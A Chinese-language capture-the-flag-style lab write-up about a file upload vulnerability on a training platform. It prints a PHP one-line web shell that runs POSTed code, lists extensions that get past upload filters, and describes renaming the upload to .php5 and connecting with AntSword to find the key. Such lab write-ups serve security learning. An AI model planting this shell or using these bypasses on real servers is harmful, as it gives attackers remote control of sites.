WEB安全-文件上传-WebShell文件上传漏洞分析溯源(第1题)


前言 这是文件上传的第一篇,SQL注入那边暂时先放一下,最近刚好看到了文件上传部分的知识,趁热打铁练练手,链接如下:https://www.mozhe.cn/bug/detail/UjV1cnhrbUxVdmw5VitBdmRyemNDZz09bW96aGUmozhe 正文 首先明确实训目标 一句话木马 <?php phpinfo(); @eval($_POST['cmd']); ?> 后缀绕过:以下后缀网站都会当成php去执行 php php3 php5 phtml asp asa cdx cer aspx ashx shtml 从1和2的目标可以发现,是通过后缀名进行绕过的,所以先抓包,修改修改文件后缀为php5,可以看到上传成功 不通过Repeater重放,直接查看页面效果如下 然后输入文件保存地址的url,如下效果 用蚁剑连接,密码cmd,发现可行,翻看文件夹,找到key 总结 文件上传部分没有太多的需要理解的东西,就是类型多,有的时候即使你知道有这些类型,但是在黑盒测试的情况下,也不知道到底是哪一个,所以形成一个具体的判断流程,对使用哪种方法有清晰的认识,从而才能判断出正确的上传方法